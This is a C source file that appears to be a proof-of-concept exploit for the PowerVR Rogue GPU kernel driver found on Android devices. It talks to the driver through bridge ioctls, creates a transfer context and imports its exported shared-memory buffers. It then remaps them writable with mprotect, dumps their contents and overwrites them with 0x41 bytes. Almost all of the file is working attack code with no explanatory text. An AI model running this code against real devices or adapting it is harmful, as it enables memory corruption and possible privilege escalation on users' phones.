#include <err.h>
#include <unistd.h>
#include <assert.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/signalfd.h>

#define __packed __attribute__((packed))

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count;) {
    unsigned char *orig_bytes = ((unsigned char*)_data) + byte_offset;
    unsigned char bytes[16];
    if (!memcpy(bytes, orig_bytes, 16)) {
      puts("** inaccessible page **\n");
      byte_offset = (byte_offset + 0x1000) & ~0xff0UL;
      continue;
    }
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
            16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
    byte_offset += 16;
  }
}

static int gpu_fd;

#define DRM_IOCTL_PVR_SRVKM_INIT 0x40046445
#define PVR_SRVKM_SERVICES_INIT  1
#define PVR_SRVKM_SYNC_INIT 2
struct drm_pvr_srvkm_init_data {
	uint32_t init_module;
};
static void srvkm_init(void) {
  struct drm_pvr_srvkm_init_data data = { .init_module = PVR_SRVKM_SERVICES_INIT };
  SYSCHK(ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_INIT, &data));
}


struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
#define DRM_IOCTL_PVR_SRVKM_CMD  0xc0206440

static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_CMD, &cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})

typedef uint8_t IMG_BYTE;
typedef void *IMG_HANDLE;
typedef int PVRSRV_ERROR;
typedef uint64_t IMG_DEV_VIRTADDR;
typedef uint64_t IMG_DEVMEM_SIZE_T;
typedef uint64_t IMG_DEVMEM_ALIGN_T;
typedef uint8_t IMG_UINT8;
typedef uint32_t IMG_UINT32;
typedef uint64_t IMG_UINT64;
typedef IMG_UINT64 PVRSRV_MEMALLOCFLAGS_T;

#define PVRSRV_BRIDGE_SRVCORE 1

#define PVRSRV_BRIDGE_SRVCORE_ACQUIREINFOPAGE 15
typedef struct PVRSRV_BRIDGE_IN_ACQUIREINFOPAGE_TAG
{
	//IMG_UINT32 ui32EmptyStructPlaceholder;
} __packed PVRSRV_BRIDGE_IN_ACQUIREINFOPAGE;
typedef struct PVRSRV_BRIDGE_OUT_ACQUIREINFOPAGE_TAG
{
	IMG_HANDLE hPMR;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_ACQUIREINFOPAGE;

#define PVRSRV_BRIDGE_MM 6

#define PVRSRV_BRIDGE_MM_PMRMAKELOCALIMPORTHANDLE 3
typedef struct PVRSRV_BRIDGE_IN_PMRMAKELOCALIMPORTHANDLE_TAG
{
	IMG_HANDLE hBuffer;
} __packed PVRSRV_BRIDGE_IN_PMRMAKELOCALIMPORTHANDLE;
typedef struct PVRSRV_BRIDGE_OUT_PMRMAKELOCALIMPORTHANDLE_TAG
{
	IMG_HANDLE hExtMem;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_PMRMAKELOCALIMPORTHANDLE;

#define PVRSRV_BRIDGE_MM_PMRLOCALIMPORTPMR 6
typedef struct PVRSRV_BRIDGE_IN_PMRLOCALIMPORTPMR_TAG
{
	IMG_HANDLE hExtHandle;
} __packed PVRSRV_BRIDGE_IN_PMRLOCALIMPORTPMR;
typedef struct PVRSRV_BRIDGE_OUT_PMRLOCALIMPORTPMR_TAG
{
	IMG_DEVMEM_ALIGN_T uiAlign;
	IMG_DEVMEM_SIZE_T uiSize;
	IMG_HANDLE hPMR;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_PMRLOCALIMPORTPMR;

#define PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2 47
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2_TAG
{
	IMG_DEV_VIRTADDR sAddress;
	IMG_DEVMEM_SIZE_T uiLength;
	IMG_HANDLE hDevmemServerHeap;
	PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2_TAG
{
	IMG_HANDLE hReservation;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2;

#define PVRSRV_BRIDGE_MM_DEVMEMINTUNRESERVERANGE2 48
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTUNRESERVERANGE2_TAG
{
	IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTUNRESERVERANGE2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTUNRESERVERANGE2_TAG
{
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTUNRESERVERANGE2;

#define PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE 17
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE_TAG
{
	uint64_t sHeapBaseAddr;
	uint64_t uiHeapLength;
	IMG_HANDLE hDevmemCtx;
	uint32_t ui32Log2DataPageSize;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE_TAG
{
	IMG_HANDLE hDevmemHeapPtr;
	int eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE;

#define PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE 15
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE_TAG
{
	int bbKernelMemoryCtx;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE_TAG
{
	IMG_HANDLE hDevMemServerContext;
	IMG_HANDLE hPrivData;
	int eError;
	unsigned int ui32CPUCacheLineSize;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE;

#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR 10
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
	uint64_t uiChunkSize;
	uint64_t uiSize;
	uint32_t *pui32MappingTable;
	const char *puiAnnotation;
	uint32_t ui32AnnotationLength;
	uint32_t ui32Log2PageSize;
	uint32_t ui32NumPhysChunks;
	uint32_t ui32NumVirtChunks;
	uint32_t ui32PDumpFlags;
	uint32_t ui32PID;
	uint64_t uiFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
	IMG_HANDLE hPMRPtr;
	int eError;
  PVRSRV_MEMALLOCFLAGS_T uiOutFlags;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR;

#define PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR2 49
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2_TAG
{
	IMG_HANDLE hDevmemServerHeap;
	IMG_HANDLE hPMR;
	IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2_TAG
{
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2;

#define PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPMR2 50
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2_TAG
{
	IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2_TAG
{
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2;

#if 0
#define PVRSRV_BRIDGE_RGXTQ2 137
#define PVRSRV_BRIDGE_RGXTQ2_RGXTDMGETSHAREDMEMORY 5
typedef struct PVRSRV_BRIDGE_IN_RGXTDMGETSHAREDMEMORY_TAG
{
	//IMG_UINT32 ui32EmptyStructPlaceholder;
} __packed PVRSRV_BRIDGE_IN_RGXTDMGETSHAREDMEMORY;
typedef struct PVRSRV_BRIDGE_OUT_RGXTDMGETSHAREDMEMORY_TAG
{
	IMG_HANDLE hCLIPMRMem;
	IMG_HANDLE hUSCPMRMem;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_RGXTDMGETSHAREDMEMORY;
#endif

#define PVRSRV_BRIDGE_RGXTQ 128
#define PVRSRV_BRIDGE_RGXTQ_RGXCREATETRANSFERCONTEXT 0
typedef struct PVRSRV_BRIDGE_IN_RGXCREATETRANSFERCONTEXT_TAG
{
#ifndef OLD_ANDROID
	IMG_UINT64 ui64RobustnessAddress;
#endif
	IMG_HANDLE hPrivData;
	IMG_BYTE *pui8FrameworkCmd;
	IMG_UINT32 ui32ContextFlags;
	IMG_UINT32 ui32FrameworkCmdize;
	IMG_UINT32 ui32PackedCCBSizeU8888;
	IMG_UINT32 ui32Priority;
} __packed PVRSRV_BRIDGE_IN_RGXCREATETRANSFERCONTEXT;
typedef struct PVRSRV_BRIDGE_OUT_RGXCREATETRANSFERCONTEXT_TAG
{
	IMG_HANDLE hCLIPMRMem;
	IMG_HANDLE hTransferContext;
	IMG_HANDLE hUSCPMRMem;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_RGXCREATETRANSFERCONTEXT;


static IMG_HANDLE create_device_memory_context(IMG_HANDLE *priv_data_out) {
  PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE in = { .bbKernelMemoryCtx = false };
  PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE);
  printf("cache line: %u bytes\n", out.ui32CPUCacheLineSize);
  *priv_data_out = out.hPrivData;
  return out.hDevMemServerContext;
}

static IMG_HANDLE create_heap(IMG_HANDLE mem_ctx, unsigned int page_size_log2, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE in = {
    .sHeapBaseAddr = base,
    .uiHeapLength = len,
    .hDevmemCtx = mem_ctx,
    .ui32Log2DataPageSize = page_size_log2,
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE);
  return out.hDevmemHeapPtr;
}

static IMG_HANDLE create_reservation(IMG_HANDLE heap, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2 in = {
    .sAddress = base, .uiLength = len, .hDevmemServerHeap = heap
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2 out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2);
  return out.hReservation;
}

static void destroy_reservation(IMG_HANDLE resv) {
  PVRSRV_BRIDGE_IN_DEVMEMINTUNRESERVERANGE2 in = { .hReservation = resv };
  PVRSRV_BRIDGE_OUT_DEVMEMINTUNRESERVERANGE2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTUNRESERVERANGE2);
}

static void unmap_pmr(IMG_HANDLE reservation) {
  PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2 in = { .hReservation = reservation };
  PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPMR2);
}

// non-sparse, locked
static IMG_HANDLE alloc_pmr(uint64_t alloc_size) {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  uint64_t cpu_cache_mode = 2; // cache-coherent with snoop if supported
  uint64_t gpu_cache_mode = 2; // cache-coherent with snoop if supported
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = alloc_size,
    .uiSize = alloc_size,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = 12,
    .ui32NumPhysChunks = 1, // ?
    .ui32NumVirtChunks = 1,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | (gpu_cache_mode << 8) | (cpu_cache_mode << 11) |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) | (/*cache clean*/1<<19) |
               (/*zero backing*/0<<20) | (/*zero on alloc*/0ULL<<31) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR);
  return out.hPMRPtr;
}

static void map_pmr(IMG_HANDLE heap, IMG_HANDLE resv, IMG_HANDLE pmr) {
  PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2 in = {
    .hDevmemServerHeap = heap,
    .hPMR = pmr,
    .hReservation = resv,
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR2);
}

static IMG_HANDLE export_to_import(IMG_HANDLE mem_export) {
  PVRSRV_BRIDGE_IN_PMRMAKELOCALIMPORTHANDLE in = { .hBuffer = mem_export };
  PVRSRV_BRIDGE_OUT_PMRMAKELOCALIMPORTHANDLE out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PMRMAKELOCALIMPORTHANDLE);
  return out.hExtMem;
}

static IMG_HANDLE import_to_pmr(IMG_HANDLE mem_import, size_t *size) {
  PVRSRV_BRIDGE_IN_PMRLOCALIMPORTPMR in = { .hExtHandle = mem_import };
  PVRSRV_BRIDGE_OUT_PMRLOCALIMPORTPMR out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PMRLOCALIMPORTPMR);
  if (size)
    *size = out.uiSize;
  return out.hPMR;
}

static char *mmap_export_writable(IMG_HANDLE mem_export, size_t *sizep) {
  size_t size;
  IMG_HANDLE pmr = import_to_pmr(export_to_import(mem_export), &size);
  char *res = SYSCHK(mmap(NULL, size, PROT_READ, MAP_SHARED, gpu_fd,
        (unsigned long)pmr << 12));
  SYSCHK(mprotect(res, size, PROT_READ|PROT_WRITE));
  if (sizep)
    *sizep = size;
  return res;
}

#define RGX_GENERAL_HEAP_BASE 0x8000000000UL
#define RGX_GENERAL_HEAP_SIZE 0x2000000000UL

int main(void) {
  sync();
  setbuf(stdout, NULL);

#ifdef OLD_ANDROID
  gpu_fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
#else
  gpu_fd = SYSCHK(open("/dev/dri/by-path/platform-pvr-rogue.1.auto-card", O_RDWR));
  srvkm_init();
#endif

  IMG_HANDLE priv_data;
  IMG_HANDLE mem_ctx = create_device_memory_context(&priv_data);

  IMG_HANDLE export_CLI, export_USC;
  {
    PVRSRV_BRIDGE_IN_RGXCREATETRANSFERCONTEXT in = {
      .hPrivData = priv_data,
      .ui32PackedCCBSizeU8888 = (13<<8)|13,
#ifdef OLD_ANDROID
      // avoid NULL deref crash in old Xiaomi code
      .pui8FrameworkCmd = "A",
      .ui32FrameworkCmdize = 1
#endif
    };
    PVRSRV_BRIDGE_OUT_RGXCREATETRANSFERCONTEXT out;
    do_driver_cmd(PVRSRV_BRIDGE_RGXTQ, PVRSRV_BRIDGE_RGXTQ_RGXCREATETRANSFERCONTEXT);
    export_CLI = out.hCLIPMRMem;
    export_USC = out.hUSCPMRMem;
  }

  size_t size_CLI;
  char *map_CLI = mmap_export_writable(export_CLI, &size_CLI);
  size_t size_USC;
  char *map_USC = mmap_export_writable(export_USC, &size_USC);

  hexdump(map_CLI, size_CLI);
  hexdump(map_USC, size_USC);
  memset(map_CLI, 0x41, size_CLI);
  memset(map_USC, 0x41, size_USC);
}
